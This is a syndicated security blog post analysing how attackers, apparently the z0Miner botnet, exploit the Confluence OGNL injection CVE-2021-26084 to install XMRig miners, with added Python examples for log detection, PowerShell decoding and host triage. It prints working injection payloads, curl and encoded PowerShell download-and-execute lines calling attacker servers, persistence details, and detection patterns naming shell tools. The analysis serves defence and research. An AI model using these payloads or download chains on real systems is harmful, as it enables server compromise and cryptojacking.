Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers

Vulnerability Overview

On August 25, 2021 a security advisory was released for a vulnerability identified in Confluence Server, titled “CVE-2021-26084: Atlassian Confluence OGNL Injection”.

The vulnerability allows an unauthenticated attacker to achieve remote command execution by taking advantage of insecure handling of OGNL (Object-Graph Navigation Language) on affected Confluence servers.

Shortly after publication, numerous POCs/exploits were published online; at the time of writing this blog there are 32 GitHub repositories available for CVE-2021-26084.

Besides the publicly available exploits (attempts to execute them were already detected on our systems), Imperva security researchers were able to identify attackers' attempts to exploit this vulnerability in order to install and run the XMRig cryptocurrency miner on affected Confluence servers running on Windows and Linux systems.

Analysis

Attacker Methodology

As mentioned above, we were able to detect payloads targeting Windows and Linux Confluence servers.

In both cases, the attacker uses the same methodology to exploit a vulnerable Confluence Server.

  • The attacker determines the target operating system and downloads Linux shell/Windows PowerShell dropper scripts from a remote C&C server, writing them to a writable location on the affected system (under /tmp on Linux and the $env:TMP system variable on Windows).
  • The downloaded dropper scripts are executed.
  • The dropper scripts perform the following actions to download, install and execute the XMRig crypto mining files:
    • Removal of competing crypto mining processes and their related files.
    • Establishing persistence by adding a crontab entry/scheduled task depending on the operating system.
    • Download of the XMRig crypto mining files and post-exploitation clean-up scripts. The files are written to temporary locations, masked as legitimate services/executables.
    • Starting XMRig mining.
    • Execution of post-exploitation scripts.

Downloaded Dropper Scripts

The following malicious payload was observed on our monitoring systems:
queryString=aaaaaaaa'+{Class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval('var isWin =
java.lang.System.getProperty("os.name").toLowerCase().contains("win");
var cmd = new java.lang.String("curl -fsSL
hxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg");var p = new
java.lang.ProcessBuilder(); if(isWin){p.command("cmd.exe", "/c", cmd);
} else{p.command("bash", "-c", cmd); }p.redirectErrorStream(true); var
process = p.start(); var inputStreamReader = new
java.io.InputStreamReader(process.getInputStream());
var bufferedReader = new java.io.BufferedReader(inputStreamReader); var
line = ""; var output = ""; while((line = bufferedReader.readLine())
!= null){output = output + line + java.lang.Character.toString(10);
}')}+'

From the sample above we can see that the attacker first determines the vulnerable server's operating system by calling java.lang.System.getProperty("os.name").
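As an added example (not code from the article or from Imperva), the following Python script shows how a defender could flag this pattern in web-server access logs: it isolates the vulnerable queryString parameter, URL-decodes it, and counts independent indicators of the break-out / script-engine / process-spawning chain seen in the payload above, alerting only when more than one fires so that an ordinary search for the word "bash" does not trip it. The sample request lines and their paths are constructed for this example and are not a statement about which Confluence endpoints are affected.

```python
import re
from typing import List, Optional
from urllib.parse import unquote_plus

# Indicators of the injection technique visible in the observed payload: an OGNL
# expression break-out ( ...'+{ ... }+' ) followed by Java reflection, script-engine
# and process-spawning calls. Constructed for this example; not a complete signature set.
OGNL_INDICATORS = [
    ("ognl-breakout",   re.compile(r"'\s*\+\s*\{")),
    ("reflection",      re.compile(r"Class\.forName\s*\(", re.I)),
    ("script-engine",   re.compile(r"javax\.script\.ScriptEngineManager", re.I)),
    ("process-builder", re.compile(r"java\.lang\.(?:ProcessBuilder|Runtime)", re.I)),
    ("shell-invoke",    re.compile(r"\b(?:cmd\.exe|bash|powershell)\b", re.I)),
]

# Only the queryString parameter is inspected: it is the vulnerable parameter in the
# article's payload, and matching the whole URL would trip on ordinary page content.
PARAM_RE = re.compile(r"(?:^|[?&])queryString=([^&\s]*)", re.I)

# Constructed sample access-log request lines (paths are illustrative only).
# Line 2 carries a shortened, URL-encoded form of the break-out shown in the article;
# line 3 is a benign search that happens to contain the word "bash".
SAMPLE_LOG = [
    "GET /pages/createpage-entervariables.action?SpaceKey=DOCS&queryString=release+notes HTTP/1.1",
    "GET /pages/createpage-entervariables.action?queryString=aaaaaaaa%27%2B%7BClass.forName"
    "%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29%7D%2B%27 HTTP/1.1",
    "GET /dosearchsite.action?queryString=bash+scripting+guide HTTP/1.1",
]


def extract_query_string(request_line: str) -> Optional[str]:
    """Return the URL-decoded value of the queryString parameter, or None if absent."""
    m = PARAM_RE.search(request_line)
    return unquote_plus(m.group(1)) if m else None


def classify_request(request_line: str) -> List[str]:
    """Names of the indicators matched inside the decoded queryString value."""
    value = extract_query_string(request_line)
    if value is None:
        return []
    return [name for name, rx in OGNL_INDICATORS if rx.search(value)]


def is_suspicious(request_line: str, min_hits: int = 2) -> bool:
    """Require at least two independent indicators so a lone keyword does not alert."""
    return len(classify_request(request_line)) >= min_hits


def scan_log(lines: List[str]) -> List[dict]:
    """One record per suspicious line, with the indicators that fired."""
    return [
        {"line_no": i, "indicators": classify_request(line)}
        for i, line in enumerate(lines, start=1)
        if is_suspicious(line)
    ]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line_no']}: {', '.join(hit['indicators'])}")
```

Decoding before matching is the point that is easy to miss: the break-out characters ', +, { and } are almost always percent-encoded on the wire, so a rule that matches the raw request line sees none of them.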

Once the operating system is determined, a file is downloaded from a remote source, either using curl, as can be seen in the example above, or using PowerShell:

Download of a Linux shell dropper script:
var cmd = new java.lang.String("curl -fsSL hxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg");

Download of a Windows PowerShell dropper script:
var cmd = new java.lang.String("powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC
4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAo
ACcAaAB0AHQAcAA6AC8ALwAyADcALgAxAC4AMQAuADMANAA6ADgAMAA4ADAALwBkAG8AYw
BzAC8AcwAvAHMAeQBzAC4AcABzADEAJwApAA=="
);

The PowerShell payload is base64 encoded; decoded, it yields the following code, which downloads the sys.ps1 file:
IEX (New-Object System.Net.Webclient).DownloadString('hxxp://27.1.1.34:8080/docs/s/sys.ps1')
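Decoding such a payload is routine triage work. The following Python helper, added here as an example (not the article's or Imperva's code), does what an analyst does by hand: strips the line wrapping, base64-decodes, interprets the bytes as UTF-16LE (which is what PowerShell's -EncodedCommand / -enc expects, and why a plain base64 decode shows a NUL after every character), and defangs every URL and IPv4 address before anything is reported. The base64 input is the blob shown above; the report fields and the hxxp / [.] defang convention are this example's own choices.

```python
import base64
import re
from typing import List

# The base64 blob from the observed payload, re-joined from the wrapped lines above.
ENCODED_COMMAND = (
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC"
    "4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAo"
    "ACcAaAB0AHQAcAA6AC8ALwAyADcALgAxAC4AMQAuADMANAA6ADgAMAA4ADAALwBkAG8AYw"
    "BzAC8AcwAvAHMAeQBzAC4AcABzADEAJwApAA=="
)

URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)
IPV4_RE = re.compile(r"\b(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\b")


def decode_encoded_command(blob: str) -> str:
    """Decode a PowerShell -EncodedCommand / -enc argument.

    PowerShell expects base64 over the UTF-16LE bytes of the script. Whitespace left
    over from line wrapping is removed before decoding.
    """
    raw = base64.b64decode("".join(blob.split()))
    return raw.decode("utf-16-le")


def defang(text: str) -> str:
    """Neutralise URLs and IPv4 addresses for reports: http -> hxxp, dots -> [.]."""
    text = re.sub(r"(?i)\bhttp(s?://)", r"hxxp\1", text)
    return IPV4_RE.sub(lambda m: "[.]".join(m.groups()), text)


def extract_iocs(script: str) -> List[str]:
    """Defanged URLs referenced by a decoded script, in order of appearance."""
    return [defang(u) for u in URL_RE.findall(script)]


def analyse_encoded_command(blob: str) -> dict:
    """Decode once and return a report that only ever contains defanged strings."""
    script = decode_encoded_command(blob)
    return {
        "length": len(script),
        "command": defang(script),
        "urls": extract_iocs(script),
        # The IEX-over-DownloadString shape is the "fetch and run" stager pattern.
        "downloads_and_executes": ("IEX" in script or "Invoke-Expression" in script)
        and "DownloadString" in script,
    }


if __name__ == "__main__":
    for key, value in analyse_encoded_command(ENCODED_COMMAND).items():
        print(f"{key}: {value}")
```

Keeping the raw decode inside the function and returning only defanged text is deliberate: a report or ticket built from this output cannot accidentally become a clickable link to the C&C.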

Shell dropper script:
curl -fsSL hxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg
Post-exploitation clean-up scripts that remove all traces of the dropper script mentioned above:
curl -fsSL hxxp://27.1.1.34:8080/docs/s/kg.txt -o /tmp/.solrx
curl -fsSL hxxp://27.1.1.34:8080/docs/s/kk.txt -o /tmp/.solrx
curl -fsSL hxxp://27.1.1.34:8080/docs/s/kill.sh -o /tmp/.{random_string}

Executing Downloaded Dropper Scripts

The downloaded dropper scripts are executed using the same payload found in the vulnerable queryString parameter shown above.

Below is one example where, again, the attacker uses a different code execution command depending on the operating system detected on the affected server:
queryString=aaaaaaaa'+{Class.forName('javax.script.ScriptEngineManager
').newInstance().getEngineByName('JavaScript').eval('var isWin =
java.lang.System.getProperty("os.name").toLowerCase().contains("win");
var cmd = new java.lang.String("bash /tmp/.solrg");var p = new
java.lang.ProcessBuilder(); if(isWin){p.command("cmd.exe", "/c", cmd);
} else{p.command("bash", "-c", cmd); }p.redirectErrorStream(true); var
process = p.start(); var inputStreamReader = new
java.io.InputStreamReader(process.getInputStream()); var
bufferedReader = new java.io.BufferedReader(inputStreamReader); var
line = ""; var output = ""; while((line = bufferedReader.readLine())
!= null){output = output + line + java.lang.Character.toString(10);
}')}+'

Dropper Script Analysis

As mentioned earlier, the first part of the dropper scripts performs the removal of competing crypto mining processes and their related files.

On Linux methods:

CVE 2021 26084 image 2

On Windows methods:

CVE 2021 26084 image 3

In the next step, the script establishes persistence by adding a crontab entry/scheduled task, and downloads additional files from publicly available platforms that commonly host malware (pastebin).

On Linux methods:

CVE 2021 26084 image 4

On Windows methods:

CVE 2021 26084 image 5

The script then finally downloads the XMRig cryptocurrency miner files.

The files are written to temporary locations, masked as legitimate services/executables.

And finally, the script starts XMRig mining; execution of the post-exploitation scripts is done separately.

The set of actions described above is executed differently depending on the target operating system.

On Linux methods:

CVE 2021 26084 image 6

Downloaded XMRig cryptocurrency miner files:
curl -fsSL hxxp://27[.]1[.]1[.]34[:]8080/docs/s/config.json -o /tmp/.solr/config.json – Miner Config file
curl -fsSL hxxp://222[.]122[.]47[.]27[:]2143/auth/solrd.exe -o /tmp/.solr/solrd – XMRig Miner
curl -fsSL hxxp://27[.]1[.]1[.]34[:]8080/docs/s/solr.sh -o /tmp/.solr/solr.sh – XMRig Miner starter script

The script then executes the solr.sh miner starter script, which in turn executes solrd, the XMRig miner binary that starts the mining process.
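The artifacts listed in this section (crontab persistence, hidden files under /tmp/.solr, a process named after the Solr service) are what a responder would hunt for on a Linux host. The Python below is an added example, not the article's or Imperva's code: it runs those checks over collector output handed to it as plain lists (crontab lines, file paths, process name/executable pairs) so it can be exercised offline. The indicator sets come from this article; the sample data is constructed for the example (the cron line mirrors the download command shown earlier, defanged the same way), and the benign /tmp prefixes and the pastebin.com hostname are this example's own assumptions.

```python
import re
from typing import List, Tuple

Finding = Tuple[str, str]   # (indicator kind, evidence)

# Indicators taken from the Linux dropper chain described in this article (not exhaustive).
C2_HOSTS = {"27.1.1.34", "222.122.47.27"}
PASTE_HOSTS = {"pastebin.com"}          # assumption: the article only says "pastebin"
DROPPED_PATHS = {
    "/tmp/.solrg", "/tmp/.solrx",
    "/tmp/.solr/config.json", "/tmp/.solr/solrd", "/tmp/.solr/solr.sh",
}
MASKED_NAMES = {"solrd", "solr.sh"}     # chosen by the dropper to resemble the Solr service
BENIGN_TMP_PREFIXES = ("/tmp/.X11-unix", "/tmp/.ICE-unix", "/tmp/.font-unix")  # assumption

# curl/wget followed by a URL; "hxxp" is accepted so defanged collector output works too.
FETCH_RE = re.compile(r"\b(?:curl|wget)\b[^|;&]*?h(?:tt|xx)ps?://([^/\s:'\"]+)")
TMP_EXEC_RE = re.compile(r"(?:^|[\s;&|])(?:bash|sh|\.)\s+(/tmp/\S+)")
IPV4_RE = re.compile(r"\b(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\b")


def defang(text: str) -> str:
    return IPV4_RE.sub(lambda m: "[.]".join(m.groups()), text)


def check_crontab(lines: List[str]) -> List[Finding]:
    """Flag cron entries that fetch from known C2/paste hosts or execute out of /tmp."""
    findings: List[Finding] = []
    for line in lines:
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        for host in FETCH_RE.findall(line):
            if host in C2_HOSTS:
                findings.append(("cron-fetch-from-c2", defang(host)))
            elif host in PASTE_HOSTS:
                findings.append(("cron-fetch-from-paste-site", host))
        for path in TMP_EXEC_RE.findall(line):
            findings.append(("cron-exec-from-tmp", path))
    return findings


def check_files(paths: List[str]) -> List[Finding]:
    """Flag the dropper's known artifacts and any other hidden file under /tmp."""
    findings: List[Finding] = []
    for p in paths:
        if p in DROPPED_PATHS:
            findings.append(("known-dropper-artifact", p))
        elif p.startswith("/tmp/.") and not p.startswith(BENIGN_TMP_PREFIXES):
            findings.append(("hidden-file-in-tmp", p))
    return findings


def check_processes(procs: List[Tuple[str, str]]) -> List[Finding]:
    """procs: (process name, executable path). A genuine Solr runs as java from its install dir."""
    findings: List[Finding] = []
    for name, exe in procs:
        if name in MASKED_NAMES or exe in DROPPED_PATHS:
            findings.append(("masked-miner-process", f"{name} ({exe})"))
        elif exe.startswith("/tmp/"):
            findings.append(("process-running-from-tmp", f"{name} ({exe})"))
    return findings


def triage(crontab: List[str], files: List[str], procs: List[Tuple[str, str]]) -> List[Finding]:
    return check_crontab(crontab) + check_files(files) + check_processes(procs)


# Constructed sample collector output; none of this was captured from a real host.
SAMPLE_CRONTAB = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "*/10 * * * * curl -fsSL hxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg && bash /tmp/.solrg",
]
SAMPLE_FILES = [
    "/tmp/.X11-unix", "/tmp/hsperfdata_confluence",
    "/tmp/.solr/config.json", "/tmp/.solr/solrd", "/tmp/.cache-x",
]
SAMPLE_PROCS = [("java", "/usr/bin/java"), ("solrd", "/tmp/.solr/solrd")]

if __name__ == "__main__":
    for kind, evidence in triage(SAMPLE_CRONTAB, SAMPLE_FILES, SAMPLE_PROCS):
        print(f"{kind:28} {evidence}")
```

The exact paths will change between campaigns, which is why the generic checks (anything executed from /tmp by cron, any process whose executable lives under /tmp, any hidden file in /tmp outside the usual X11 sockets) matter more than the literal IoC set.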

On Windows systems:
First some variables are set, followed by a custom function (function Update($url,$path,$proc_name)) that performs file downloads using the WebClient.DownloadFile method of a System.Net.WebClient object;
this function is used later in the script:

CVE 2021 26084 image 7

XMRig miner executable, miner name and path:
$miner_url = "hxxp://222[.]122[.]47[.]27[:]2143/auth/xmrig.exe"
$miner_name = "javae"
$miner_path = "$env:TMP\javae.exe"

Miner configuration file, name and path:
$miner_cfg_url = "hxxp://27[.]1[.]1[.]34[:]8080/docs/s/config.json"
$miner_cfg_name = "config.json"
$miner_cfg_path = "$env:TMP\config.json"

Clean-up batch script (clean.bat), name and path:
$killmodule_url = "hxxp://27[.]1[.]1[.]34[:]8080/examples/clean.bat"
$killmodule_name = "clean.bat"
$killmodule_path = "$env:TMP\clean.bat"

After the script variables are set, the script performs the following actions:

Clears the System File, Hidden File and Read-Only attributes of any previously installed miner configuration files (config.json), and deletes their related files and folders.
Using the custom Update function, it downloads the miner executable and config files by passing the variables set earlier to that function.
Next it sets the System File, Hidden File and Read-Only attributes on the newly downloaded miner files, and starts the miner process.

CVE 2021 26084 image 8

The last step is executing the clean-up batch script and terminating the powershell.exe process.

Attacker Origin

The threat actors' TTPs (tactics, techniques, procedures) are not new and we have seen similar attack campaigns in the past. Based on the data we observed, including downloaders, payloads, configuration, C&C servers and more, we identified a known threat actor tied to earlier attack campaigns going back as far as March 2021.

The C&C 27[.]1[.]1[.]34[:]8080 has previously been associated with the z0Miner botnet.
z0Miner is a malicious mining family that became active last year and has been publicly analyzed by the Tencent Security Team.

It was found that the attackers exploited two Oracle WebLogic RCE vulnerabilities (CVE-2020-14882 and CVE-2020-14883), using the same methodology as described earlier to install XMRig crypto miners on affected systems.

In earlier cases it was found that the same botnet was exploiting an ElasticSearch RCE vulnerability (CVE-2015-1427) and an older RCE impacting Jenkins servers, using the same methodology.

Our findings lead us to believe that the same z0Miner botnet is actively exploiting CVE-2021-26084 for XMRig crypto mining.

Other Identified Payloads

Other payloads were observed on our monitoring systems attempting to exploit CVE-2021-26084, and were identified as:

Muhstik IoT botnet activity
curl -s 194[.]31[.]52[.]174/conf2||wget -qO -
194[.]31[.]52[.]174/conf2

The following research was published about this identified bot activity:

Muhstik Takes Aim at Confluence CVE 2021-26084

VirusTotal identified the following payloads as:

BillGates Botnet
curl -O hxxp://213[.]202[.]230[.]103/syna;wget
hxxp://213[.]202[.]230[.]103/syna

Dofloo Trojan
curl -O hxxp://213[.]202[.]230[.]103/quu;wget
hxxp://213[.]202[.]230[.]103/quu

Summary

As is often the case with RCE vulnerabilities, attackers rush to exploit affected systems for their own gain. RCE vulnerabilities can easily allow threat actors to exploit affected systems for easy monetary gain by installing cryptocurrency miners and masking their activity, thus abusing the processing resources of the target.

Once CVE-2021-26084 was publicly disclosed, the Imperva Threat Research team immediately began researching a mitigation. It was soon found that protection against the vulnerability was already provided out of the box.


*** This is a Security Bloggers Network syndicated blog from Blog authored by Daniel Kerman. Read the original post at: https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/


About the Author: Daniel